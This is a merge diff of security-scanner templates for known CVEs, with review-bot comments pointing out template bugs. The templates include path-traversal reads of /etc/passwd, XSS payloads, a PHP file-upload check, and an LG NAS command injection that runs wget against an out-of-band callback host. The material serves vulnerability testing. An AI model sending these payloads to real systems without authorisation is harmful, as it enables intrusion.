Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
a4e9469544
@ -94,4 +94,6 @@ You can refer to the following articles of Git and GitHub basics. In case you ar

## Tip from us😇

**Nuclei** outcomes are only as excellent as **template matchers💡**
- **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive
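Review bot: both new bullets end in "reduce false positive"; it should be "false positives". The second bullet would also be more useful if it named the pattern that the XSS templates in this same commit actually use: match the reflected payload in the body together with a `text/html` Content-Type header matcher and a status matcher, rather than the payload alone, because a reflection in a `text/plain` or JSON response is not an executable XSS.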
@ -0,0 +1,27 @@
id: CVE-2009-5114

info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference: |
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- type: status
status:
- 200
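Review bot: `reference: |` makes the two `- https://...` lines beneath it a single literal multi-line string, not a YAML sequence, so `info.reference` carries the dash characters as text rather than two URLs. Drop the `|` and indent the URLs as list items under `reference:`. The same `reference: |` construction is repeated in most of the other new CVE templates in this commit (CVE-2012-0991, CVE-2014-4535, CVE-2014-4536, CVE-2015-3648, CVE-2017-15647, CVE-2018 LG NAS, CVE-2019-12276, CVE-2019-14312, CVE-2020-11455, CVE-2020-26153, CVE-2020-9036) and should be fixed the same way in one pass.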
@ -0,0 +1,27 @@
id: CVE-2012-0991

info:
name: OpenEMR 4.1 - Local File Inclusion
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
reference: |
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr

requests:
- method: GET
path:
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- type: status
status:
- 200
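Review bot: the description says the traversal is reachable by "remote authenticated users", but the request carries no session cookie and there is no login step, so either `contrib/acog/print_form.php` is reachable without authentication (then the description should say so) or the template will not fire on a correctly configured target. Separately, the trailing `%00` in `formname=../../../etc/passwd%00` relies on null-byte truncation of the include path, which PHP removed in 5.3.4; state that constraint in the description so a miss on a newer PHP build is not read as "not vulnerable".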
@ -0,0 +1,31 @@
id: CVE-2014-4535

info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
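Review bot: the plugin directory in the path is written `import–legacy–media` with U+2013 en-dashes instead of ASCII hyphens (a hex dump of the line shows `e2 80 93`), so the request targets a directory that does not exist on any WordPress install and the template can never match. Replace both dashes with `-` so the path reads `/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?...`. A pre-merge check that rejects non-ASCII bytes inside `path:` entries would catch this class of copy-paste error.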
@ -0,0 +1,31 @@
id: CVE-2014-4536

info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
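Review bot: the body matcher cannot match any of the three payloads this request sends. Decoded, `go` reflects as `go"><script>alert(document.cookie)</script>`, `contactId` as `contactId'></script><script>alert(document.domain)</script>` and `campaignId` as `campaignId"><script>alert(document.cookie)</script>`, while the matcher looks for `"></script><script>alert(document.domain)</script>`, which takes the double quote from one parameter and the `</script>`/`document.domain` from another. Either inject the same string into all three parameters or list the strings that are actually reflected as separate `words` entries. The trailing `&` on the URL is harmless but should be removed.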
@ -0,0 +1,27 @@
id: CVE-2015-3648

info:
name: ResourceSpace - Local File inclusion
author: pikpikcu
severity: high
description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
reference: |
- https://vulners.com/cve/CVE-2015-3648/
- https://www.securityfocus.com/bid/75019
tags: cve,cve2015,lfi,resourcespace

requests:
- method: GET
path:
- "{{BaseURL}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0:"

- type: status
status:
- 200
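Review bot: the path begins with `{{BaseURL}` (one closing brace), so the variable is never substituted and the request is built from the literal text `{{BaseURL}/pages/setup.php?...`; it must be `{{BaseURL}}/pages/setup.php?defaultlanguage=...`. This is the kind of defect a template-validation step (rendering every `path:` entry against a dummy base URL and rejecting any that still contain `{{`) would catch before merge.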
@ -0,0 +1,31 @@
id: CVE-2015-6544

info:
name: iTop XSS
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544
tags: cve,cve2015,xss,itop

requests:
- method: GET
path:
- "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

- type: status
status:
- 200

- type: word
part: header
words:
- text/html
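Review bot: `title=%%3C%2Fscript%3E...` has a doubled percent sign. `%%` is not valid percent-encoding, so servers either pass the stray `%` through (the title becomes `%</script>...`) or reject the request outright, which makes the payload fragile. If the leading `%` is deliberate, encode it as `%25`; if it is a typo, drop it so the parameter starts at `%3C`. A short comment on the `path:` line saying which it is would stop the next editor from "fixing" it the wrong way.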
@ -0,0 +1,30 @@
id: CVE-2015-8349

info:
name: SourceBans XSS
author: pikpikcu
severity: medium
description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349
tags: cve,cve2015,xss,sourcebans

requests:
- method: GET
path:
- "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"

matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

- type: status
status:
- 200

- type: word
part: header
words:
- text/
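Review bot: the header matcher is `text/` rather than the `text/html` every other XSS template in this commit uses, so a `text/plain` response that merely echoes the payload (which a browser will not execute) still counts as a hit. Use `text/html` unless SourceBans is known to serve the ban list with another subtype, in which case list that subtype explicitly instead of the bare prefix.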
@ -0,0 +1,31 @@
id: CVE-2016-7981

info:
name: SPIP 3.1.2 XSS
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981
tags: cve,cve2016,xss,spip

requests:
- method: GET
path:
- "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body

- type: status
status:
- 200

- type: word
part: header
words:
- text/html
@ -0,0 +1,27 @@
id: CVE-2017-15647

info:
name: FiberHome - Directory Traversal
author: daffainfo
severity: medium
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
reference: |
- https://www.exploit-db.com/exploits/44054
- https://www.cvedetails.com/cve/CVE-2017-15647
tags: cve,cve2017,lfi,router

requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- type: status
status:
- 200
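Review bot: `severity: medium` for an unauthenticated read of `/etc/passwd` on a router is out of line with the other arbitrary-file-read templates in this same commit (CVE-2009-5114, CVE-2015-3648, CVE-2019-12276, CVE-2019-14312 and CVE-2020-11455 are all `high`), and the matcher is the identical `root:.*:0:0` check. Either raise it to `high` or add a description sentence explaining why this one is rated lower.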
@ -0,0 +1,38 @@
id: CVE-2017-6090

info:
name: PhpCollab (unauthenticated) Arbitrary File Upload
author: pikpikcu
severity: critical
tags: cve,cve2017,phpcollab,rce,fileupload
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090

requests:
- raw:
- | # REQUEST 1
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137

-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php

<?php echo md5('phpcollab_rce');?>

-----------------------------154934846911423734231554128137--

- | # REQUEST 2
GET /logos_clients/1.php HTTP/1.1
Host: {{Hostname}}

matchers-condition: and
matchers:
- type: word
part: body
words:
- "48dbd2384cb6b996fa1e2855c7f0567f"

- type: status
status:
- 200
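Review bot: request 2 fetches a hard-coded `/logos_clients/1.php`, but request 1 sends `id={{randstr}}` and uploads the file as `{{randstr}}.php`; unless the server ignores both values and always stores the logo as `1.php`, the second request 404s and the template never fires. Whichever of the two values the server uses to name the stored file, use the same expression in both requests (either `{{randstr}}` in request 2's path or a fixed `id=1` in request 1). The description is empty; it should at least say that this check leaves a PHP file under `logos_clients/` on the target, even though the body only echoes an MD5, so operators know to remove it.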
@ -0,0 +1,42 @@
id: CVE-2018–10818

info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
reference: |
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
tags: cve,cve2018,lg-nas,rce,oob

requests:
- raw:
- |
POST /system/sharedir.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

&uid=10; wget http://{{interactsh-url}}

- |
POST /en/php/usb_sync.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

&act=sync&task_number=1;wget http://{{interactsh-url}}

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

- type: status
status:
- 200
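Review bot: `id: CVE-2018–10818` uses a U+2013 en-dash between the year and the number, so the id does not follow the `CVE-YYYY-NNNN` form and does not match the CVE number written with a hyphen in the description; change it to `CVE-2018-10818`. The second reference is a write-up of CVE-2018-14839 (LG N1A1), a different issue, and the description talks about a "password" parameter while both requests inject via `uid` and `task_number`; the text should describe the requests that are actually sent. Finally, `matchers-condition: and` with a `status: 200` matcher means an interactsh callback is discarded if the injected page answers with anything but 200; for an OOB check the `interactsh_protocol` matcher is the evidence, so drop the status matcher.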
@ -0,0 +1,29 @@
id: CVE-2019-12276

info:
name: GrandNode 4.40 - Path Traversal
author: daffainfo
severity: high
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
reference: |
- https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276
tags: cve,cve2019,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
headers:
Connection: close

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- type: status
status:
- 200
@ -0,0 +1,27 @@
id: CVE-2019-14312

info:
name: Aptana Jaxer 1.0.3.4547 - Local File inclusion
author: daffainfo
severity: high
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
reference: |
- https://www.exploit-db.com/exploits/47214
- https://www.cvedetails.com/cve/CVE-2019-14312
tags: cve,cve2019,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- type: status
status:
- 200
@ -0,0 +1,27 @@
id: CVE-2020-11455

info:
name: LimeSurvey 4.1.11 - Path Traversal
author: daffainfo
severity: high
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
reference: |
- https://www.exploit-db.com/exploits/48297
- https://www.cvedetails.com/cve/CVE-2020-11455
tags: cve,cve2020,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- type: status
status:
- 200
@ -3,7 +3,7 @@ id: CVE-2020-13927
info:
name: Unauthenticated Airflow Experimental REST API
author: pdteam
severity: medium
severity: critical
tags: cve,cve2020,apache,airflow,unauth

requests:
@ -17,4 +17,4 @@ requests:
- '"dag_run_url":'
- '"dag_id":'
- '"items":'
condition: and
@ -0,0 +1,33 @@
id: CVE-2020-26153

info:
name: Event Espresso Core-Reg XSS
author: pikpikcu
severity: medium
description: |
cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: |
- https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/
- https://nvd.nist.gov/vuln/detail/CVE-2020-26153
tags: cve,cve2020,xss,wordpress,wp-plugin

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"

matchers-condition: and
matchers:
- type: word
words:
- '"/></script><script>alert(document.domain)</script>'
part: body

- type: status
status:
- 500

- type: word
part: header
words:
- text/html
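Review bot: the status matcher requires `500`, which is unusual enough that the next maintainer will "correct" it to 200 unless the reason is recorded in the file. If the template file, loaded directly outside the WordPress bootstrap, echoes the reflected `page` value and then dies with a fatal error, say so in a comment beside `- 500` and in the description. The description should also start with a capital letter (`Cross-site scripting ...`).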
@ -0,0 +1,31 @@
id: CVE-2020-27735

info:
name: Wing FTP's Web Interface XSS
author: pikpikcu
severity: medium
description: |
An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735
tags: cve,cve2020,xss,wing-ftp

requests:
- method: GET
path:
- "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"

matchers-condition: and
matchers:
- type: word
words:
- '<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content frame">'
part: body

- type: status
status:
- 200

- type: word
part: header
words:
- text/html
@ -0,0 +1,31 @@
id: CVE-2020-9036

info:
name: Jeedom through 4.0.38 allows XSS
author: pikpikcu
severity: medium
reference: |
- https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9036
tags: cve,cve2020,xss,jeedom

requests:
- method: GET
path:
- "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"

matchers-condition: and
matchers:
- type: word
words:
- '<script>document.title = "";alert(document.domain);" - Jeedom"</script>'
part: body

- type: status
status:
- 200

- type: word
part: header
words:
- text/html
@ -0,0 +1,22 @@
id: dnssec-detection

info:
name: DNSSEC Detection
description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled.
author: pdteam
severity: info
tags: dns,dnssec
reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/

dns:
- name: "{{FQDN}}"
type: DS
class: inet
recursion: true
retries: 3

extractors:
- type: regex
group: 1
regex:
- "IN\tDS\t(.+)"
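Review bot: DS stands for Delegation Signer (RFC 4034), not "Delegation of Signing", and the description sentence is missing words. Suggest: `description: Checks whether a Delegation Signer (DS) record exists for the zone in its parent, which indicates the zone is DNSSEC-signed.` The template also has only an extractor and no matcher, so a DS record shows up purely as extracted data; if a positive "DNSSEC enabled" finding is intended, add a `word` or `regex` matcher on `IN\tDS` so the result is reported as a match rather than only as extractor output.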
@ -0,0 +1,31 @@
id: camunda-login-panel
info:
name: Camunda Login panel
author: alifathi-h1
severity: info
description: Default Credentials of demo:demo on Camunda application.
reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/
tags: camunda,panel

requests:
- method: GET
path:
- '{{BaseURL}}/app/welcome/default/#!/login'
- '{{BaseURL}}/camunda/app/welcome/default/#!/login'

matchers-condition: and
matchers:

- type: word
words:
- "Camunda Welcome"
- type: status
status:
- 200

extractors:
- type: regex
part: body
group: 1
regex:
- '<footer cam-widget-footer version="v([0-9.]+)"'
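Review bot: the description says "Default Credentials of demo:demo on Camunda application", but nothing in the template submits credentials; it fingerprints the welcome page and extracts a version string. Either reword the description to what is checked (login panel reachable, version disclosed) or add a second request that actually tries the demo:demo login, which would also justify a severity above `info`. The `#!/login` fragment is never sent on the wire, so both entries resolve to `/app/welcome/default/` and `/camunda/app/welcome/default/`; drop the fragments so the paths show the real requests. There is also no blank line between `id:` and `info:` as in the sibling templates.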
@ -0,0 +1,26 @@
id: cerebro-panel

info:
name: Cerebro Panel
author: huowuzhao,elder tao
severity: high
reference: https://github.com/lmenezes/cerebro
tags: panel,cerebro

requests:
- method: GET
path:
- "{{BaseURL}}/login"

matchers:
- type: word
words:
- "<title>Cerebro</title>"
part: body

extractors:
- type: regex
part: body
group: 1
regex:
- "<small>([a-z0-9.]+)</small>"
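Review bot: `severity: high` for a panel-detection template is inconsistent with every other `panel`-tagged template in this commit, which are all `info`; a reachable login page is not by itself a high-severity finding. Lower it to `info`, or add the check that would justify the rating (for example that the Cerebro UI answers without authentication). Unlike the sibling panel templates there is also no status matcher; add `matchers-condition: and` with a `status: 200` matcher so a `<title>Cerebro</title>` string in an error page does not count.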
@ -0,0 +1,30 @@
id: cisco-sendgrid

info:
name: Cisco ServiceGrid
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
tags: panel,cisco

requests:
- method: GET
path:
- '{{BaseURL}}/pages/sdcall/Login.jsp'

matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^<title>Cisco ServiceGrid (.*)<\/title>$'

- type: status
status:
- 200

extractors:
- type: regex
part: body
group: 1
regex:
- '<div class="top\-margin">Version ([0-9.]+)<\/div>'
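Review bot: the id `cisco-sendgrid` does not match the product; `name`, the Shodan query and both regexes all say Cisco ServiceGrid, so the id should be `cisco-servicegrid`. Ids are what users pass to nuclei to select a template, so this is worth fixing before it ships rather than renaming later. The `(?m)^...$` anchors on the title regex also assume the `<title>` element sits alone on its own line; `<title>Cisco ServiceGrid .*</title>` without anchors is less brittle against minified markup.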
@ -0,0 +1,23 @@
id: clearpass-policy-manager

info:
name: ClearPass Policy Manager - Aruba Networks
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
tags: panel,aruba

requests:
- method: GET
path:
- '{{BaseURL}}/tips/tipsLogin.action'

matchers-condition: and
matchers:
- type: word
words:
- '<title>ClearPass Policy Manager - Aruba Networks</title>'

- type: status
status:
- 200
@ -0,0 +1,26 @@
id: dell-openmanager-login

info:
name: Dell OpenManage Switch Administrator
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22
tags: panel,dell

requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/config/authentication_page.htm'

matchers-condition: or
matchers:
- type: word
words:
- '<title>Dell OpenManage Switch Administrator</title>'

- type: word
words:
- '<TITLE>Log In</TITLE>'
- 'device/logOff_up_menu1.htm'
condition: and
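Review bot: the id `dell-openmanager-login` misspells the product; `name` and the title matcher both say OpenManage, so it should be `dell-openmanage-login`. With `matchers-condition: or` there is no status check on either branch, unlike the other panel templates added here; if a status condition is wanted it has to be folded into each branch (for example a `dsl` matcher combining `status_code == 200` with the `contains(body, ...)` checks), since a separate status matcher would itself satisfy the `or`.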
@ -0,0 +1,23 @@
id: f-secure-policy-manager

info:
name: F-Secure Policy Manager Server
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22
tags: login,panel

requests:
- method: GET
path:
- '{{BaseURL}}'

matchers-condition: and
matchers:
- type: word
words:
- '<title>F-Secure Policy Manager Server</title>'

- type: status
status:
- 200
@ -0,0 +1,24 @@
id: glpi-authentication

info:
name: GLPI - Authentification
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentification%22
tags: panel,auth

requests:
- method: GET
path:
- '{{BaseURL}}'

matchers-condition: and
matchers:
- type: word
words:
- '<title>GLPI - Authentication</title>'
- 'title="Powered by Teclib and contributors" class="copyright">GLPI Copyright'

- type: status
status:
- 200
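Review bot: `name` and the Shodan reference use the French title `GLPI - Authentification`, but the word matcher only accepts the English `<title>GLPI - Authentication</title>`, so the French-localised instances the Shodan query finds can match only through the second `words` entry (the Teclib copyright line). Add `<title>GLPI - Authentification</title>` as a third word (the `words` entries already OR together) or use a regex that tolerates both spellings, and pick one spelling for `name`.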
@ -0,0 +1,23 @@
id: gxd5-pacs-connexion-utilisateur

info:
name: GXD5 Pacs Connexion utilisateur
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22GXD5+Pacs+Connexion+utilisateur%22
tags: panel,login

requests:
- method: GET
path:
- '{{BaseURL}}'

matchers-condition: and
matchers:
- type: word
words:
- '<title>GXD5 Pacs Connexion utilisateur</title>'

- type: status
status:
- 200
@ -0,0 +1,20 @@
id: identity-services-engine

info:
name: Identity Services Engine
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22Identity+Services+Engine%22
tags: panel

requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/admin/'

matchers-condition: and
matchers:
- type: word
words:
- '<title>Identity Services Engine</title>'
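Review bot: `tags: panel` omits the vendor; Identity Services Engine is Cisco ISE, so `tags: panel,cisco` would let users select it together with the other Cisco panel template in this commit, and `name` should say `Cisco Identity Services Engine` for the same reason. `matchers-condition: and` with a single matcher does nothing; add the `status: 200` matcher the sibling panel templates use so there is something for it to combine.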
@ -0,0 +1,30 @@
id: sgp-login-panel

info:
name: SGP Panel
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22SGP%22
tags: panel,sgp

requests:
- method: GET
path:
- '{{BaseURL}}/accounts/login?next=/admin/'

matchers-condition: and
matchers:
- type: word
words:
- '<title>SGP</title>'

- type: status
status:
- 200

extractors:
- type: regex
part: body
group: 1
regex:
- ">Ver\\. ([0-9.A-Z]+)</p>"
@ -0,0 +1,23 @@
id: xvr-login

info:
name: XVR LOGIN
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22
tags: panel,xvr

requests:
- method: GET
path:
- '{{BaseURL}}/login.rsp'

matchers-condition: and
matchers:
- type: word
words:
- '<title>XVR LOGIN</title>'

- type: status
status:
- 200
@ -1,7 +1,7 @@
id: appsec-yml-disclosure
id: appspec-yml-disclosure

info:
name: Appsec Yml Disclosure
name: Appspec Yml Disclosure
author: dhiyaneshDk
severity: medium
reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json
@ -8,16 +8,9 @@ info:
tags: config,git,exposure

requests:
- raw:
- method: GET
- |
path:
GET /.git/config HTTP/1.1
- "{{BaseURL}}/.git/config"
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1
Connection: close

matchers-condition: and
matchers:
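Review bot: the template is being renamed to Appspec Yml Disclosure, yet the only request it makes is still for `/.git/config` (carried over from the old raw request as `{{BaseURL}}/.git/config`), which is a Git configuration exposure check and has nothing to do with an `appspec.yml` file. Either the path should become `{{BaseURL}}/appspec.yml` with matchers on that file's content, or the id, name and `config,git,exposure` tags are wrong for what the template does and a differently named template should own `/.git/config`. The conversion from a raw request to `method: GET` is otherwise an improvement: it removes the meaningless `Content-Type` and `Content-Length: 1` on a bodyless GET.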
@ -33,4 +26,4 @@ requests:

- type: status
status:
- 200
@ -0,0 +1,32 @@
id: github-gemfile-files

info:
name: Github Gemfiles
author: hahwul
severity: info
description: Find github page files(Gemfile / Gemfile.lock)
tags: github,exposure

requests:
- method: GET
path:
- "{{BaseURL}}/Gemfile"
- "{{BaseURL}}/Gemfile.lock"

matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(body, "https://rubygems.org")'
- 'contains(body, "source")'
- 'contains(body, "gem")'
- 'status_code == 200'
condition: and

- type: dsl
dsl:
- 'contains(body, "https://rubygems.org")'
- 'contains(body, "remote")'
- 'contains(body, "specs")'
- 'status_code == 200'
condition: and
@ -0,0 +1,26 @@
|
||||||
|
id: github-page-config
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Github pages config file
|
||||||
|
author: hahwul
|
||||||
|
severity: info
|
||||||
|
description: Find github pages config file.
|
||||||
|
tags: github,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/_config.yml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "jekyll"
|
||||||
|
- "title"
|
||||||
|
- "baseurl"
|
||||||
|
condition: and
|
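Review bot: `info` has no `reference:` and `description: Find github pages config file.` does not say what file this is: the `jekyll` word assumes a Jekyll `_config.yml`, so state that (`GitHub Pages (Jekyll) _config.yml exposed`). Of the three words, `title` and `baseurl` are generic; `jekyll` is the discriminating one, so keep `condition: and` as written.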
File diff suppressed because it is too large
|
@ -0,0 +1,16 @@
|
||||||
|
id: github-personal-token
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Github Personal Token
|
||||||
|
author: geeknik
|
||||||
|
severity: high
|
||||||
|
tags: token,file
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "ghp_.{36}"
|
|
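Review bot: The extractor regex `ghp_.{36}` at the end of the hunk accepts any 36 characters after the prefix, including spaces, quotes and punctuation, so it over-captures surrounding text and produces noisy extractions. The token body is alphanumeric, so `ghp_[A-Za-z0-9]{36}` is the tighter pattern and stops the match at the real token boundary.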
@ -2,7 +2,7 @@ id: private-key
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Private Key Detect
|
name: Private Key Detect
|
||||||
author: gaurang
|
author: gaurang,geeknik
|
||||||
severity: high
|
severity: high
|
||||||
